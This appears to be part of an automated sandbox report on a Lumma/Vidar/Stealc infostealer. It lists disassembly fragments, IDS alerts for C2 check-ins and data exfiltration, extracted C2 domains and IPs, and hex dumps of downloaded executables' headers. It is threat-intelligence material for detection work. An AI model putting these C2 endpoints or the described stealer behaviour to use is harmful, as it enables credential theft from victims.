Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [edx], cx	9_2_0041F8B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	9_2_0041F8B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	9_2_0041D940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	9_2_00431950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	9_2_00415172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	9_2_00415172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-24h]	9_2_00415172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [ebx]	9_2_0043F9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], 625B6034h	9_2_004211B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	9_2_00413A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+000000D8h]	9_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+34h]	9_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+34h]	9_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+18h]	9_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	9_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	9_2_004122E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	9_2_0043F290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	9_2_00427B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	9_2_00423BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [ecx], ax	9_2_0041DBEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	9_2_0043E390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	9_2_0043D470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	9_2_0043DC70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	9_2_0041C400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [ebp-10h]	9_2_0041E411
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	9_2_004104D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+38h]	9_2_0040F578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp edx	9_2_0041CDED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [ebx+01h], 00000000h	9_2_0041CDED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	9_2_00424640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	9_2_0041C660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	9_2_00415E62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+000000D8h]	9_2_0042866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	9_2_00403E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000874h]	9_2_0041E6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [edx], cx	9_2_0041E6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	9_2_00423F07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	9_2_0043DF90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp edx	9_2_0043A796

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49739 -> 147.45.68.138:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.68.138:80 -> 192.168.2.4:49739
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 147.45.68.138:80 -> 192.168.2.4:49739
Source: Network traffic	Suricata IDS: 2055575 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (awwardwiqi .shop) : 192.168.2.4:56576 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055576 - Severity 1 - ET MALWARE Observed Lumma Stealer Related Domain (awwardwiqi .shop in TLS SNI) : 192.168.2.4:49741 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.4:55775 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055489 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop) : 192.168.2.4:49742 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.4:64147 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055493 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) : 192.168.2.4:49743 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2055493 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) : 192.168.2.4:49745 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.4:49744 -> 95.164.119.162:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.68.138:80 -> 192.168.2.4:49751
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 147.45.68.138:80 -> 192.168.2.4:49751
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49742 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49741 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49742 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49741 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49743 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49745 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49745 -> 188.114.96.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: traineiwnqo.shop
Source: Malware configuration extractor	URLs: caffegclasiqwp.shop
Source: Malware configuration extractor	URLs: awwardwiqi.shop
Source: Malware configuration extractor	URLs: stamppreewntnq.shop
Source: Malware configuration extractor	URLs: evoliutwoqm.shop
Source: Malware configuration extractor	URLs: millyscroqwp.shop
Source: Malware configuration extractor	URLs: condedqpwqm.shop
Source: Malware configuration extractor	URLs: locatedblsoqp.shop
Source: Malware configuration extractor	URLs: stagedchheiqwo.shop
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199761128941

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:20 GMTContent-Type: application/octet-streamContent-Length: 2459136Last-Modified: Fri, 24 Nov 2023 13:43:06 GMTConnection: keep-aliveETag: "6560a86a-258600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 69 a8 60 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 25 00 d4 20 00 00 ca 04 00 00 00 00 00 7b 44 00 00 00 10 00 00 00 f0 20 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 25 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 db 23 00 f1 36 00 00 9c a2 24 00 28 00 00 00 00 d0 24 00 cc 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 24 00 88 e2 00 00 60 b2 23 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 b1 23 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 24 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 47 d3 20 00 00 10 00 00 00 d4 20 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 91 22 03 00 00 f0 20 00 00 24 03 00 00 d8 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 34 7c 00 00 00 20 24 00 00 62 00 00 00 fc 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b4 10 00 00 00 a0 24 00 00 12 00 00 00 5e 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 0e 01 00 00 00 c0 24 00 00 02 00 00 00 70 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 cc 12 00 00 00 d0 24 00 00 14 00 00 00 72 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 35 ff 00 00 00 f0 24 00 00 00 01 00 00 86 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:26 GMTContent-Type: application/octet-streamContent-Length: 685392Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-a7550"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:27 GMTContent-Type: application/octet-streamContent-Length: 608080Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-94750"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:27 GMTContent-Type: application/octet-streamContent-Length: 450024Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-6dde8"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:28 GMTContent-Type: application/octet-streamContent-Length: 257872Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-3ef50"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 